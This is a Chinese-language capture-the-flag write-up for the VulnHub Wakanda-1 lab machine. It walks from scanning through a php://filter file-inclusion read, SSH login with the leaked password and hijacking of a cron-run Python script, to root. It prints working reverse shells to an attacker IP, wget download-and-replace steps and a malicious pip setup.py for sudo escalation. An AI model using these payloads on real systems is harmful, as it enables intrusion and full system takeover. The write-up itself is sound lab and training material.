信息收集:
靶机地址:https://download.vulnhub.com/wakanda/wakanda-1.ova
靶机运行环境:Virtual Box
(1)ip扫描
nmap 192.168.7.0/24 -sn | grep -B 2 '08:00:27:BC:8D:C2'
(2)端口扫描
nmap -p- -A 192.168.7.160
80端口开启了http服务,在3333端口开启了ssh服务,且ssh版本为openssh6.7,之前了解到openssh7.7之前的版本中存在用户名枚举漏洞。
(3)目录扫描
dirsearch -u http://192.168.7.160
(4)网址访问,查看源码,发现了一段值
拼接扫描到的目录,没有什么有用的信息,
从网页源码上看给了一个参数,拼接访问一下index.php,因为他是脚本文件,不过得删除.php后缀才可以访问成功
lang表示可以随意切换网站的语言,在这里?lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.
/?lang=php://filter/read=convert.base64-encode/resource=index
(5)base64解码
PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=
得到源代码,并且得到了一个password:Niamey4Ever227!!!
(6)获得了一个密码,想到了开放了3333端口,3333端口用于连接ssh,而连接ssh则需要用户名和密码,密码是有了,但是用户名没有,再反过web页面看一下,底下有作者,尝试一下
getshell:
(1)进行ssh连接
ssh mamadou@192.168.7.160 -p 3333
#密码:Niamey4Ever227!!!
(2)这里执行命令,发现执行不出来,这是开启了python shell ,只能通过函数来执行命令,很麻烦,因此,我们利用python shell再开启一个bash shell
import os
os.system("/bin/bash")
(3)现在进行查看flag文件
(4)再次进行目录翻找,发现了第2个flag,在目录/home/devops目录下,这应该是两个用户目录,进行查看,发现没有权限
提权:
(1)无法执行sudo -l提权,翻看tmp目录
(2)仔细观察后发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断被调用,/srv多用来存放系统服务类脚本的多,最后在srv下找到了这个定期运行文件
(3)尝试将.antivirus.py的内容修改为如下内容,几分钟后查看tmp目录,果然出现了flag.txt,读取便获得了第二个flag
echo "f=open('/home/devops/flag2.txt', 'r').read()" > .antivirus.py
echo "open('/tmp/flag.txt','w').write(f)" >> .antivirus.py
(4)下一步是要用devops用户身份创建一个shell,所以要转到这个用户,
将.antivirus.py内容改为
import os
os.system("echo \'bash -i >& /dev/tcp/192.168.7.19/6767 0>&1\'|bash")
(5)但是我发现内容写不进去,试了好多方法,都没有成功,想到可以在kali上面写一个py文件,通过远程下载到靶机上面,然后替换.antivirus.py文件
(6)靶机进行远程下载,靶机要跳转到/tmp目录里面,否则不能下载
cd /tmp
wget http://192.168.7.19:8000/python.py
(7)进行文件替换命令
cp python.py /srv/.antivirus.py
(8)进行监听6767端口,该脚本会自动执行,只需等待几分钟就会连接
nc -lvnp 6767
(9)sudo提权
sudo -l
(10)发现pip不需要密码,创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面
from setuptools import setup
from setuptools.command.install import install
import base64
import os
class CustomInstall(install):
def run(self):
install.run(self)
RHOST = '192.168.7.19'
reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 7777; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
encoded = base64.b64encode(reverse_shell)
os.system('echo %s|base64 -d|bash' % encoded)
setup(name='FakePip',
version='0.0.1',
description='This will exploit a sudoer able to /usr/bin/pip install *',
url='https://github.com/0x00-0x00/fakepip',
author='zc00l',
author_email='andre.marques@esecurity.com.br',
license='MIT',
zip_safe=False,
cmdclass={'install': CustomInstall})
(11)在远程下载一个setup.py
cd /tmp
wget http://192.168.7.19:8000/setup.py
(12)攻击机开启nc监听端口,控制靶机执行
sudo -H /usr/bin/pip install . --upgrade --force-reinstall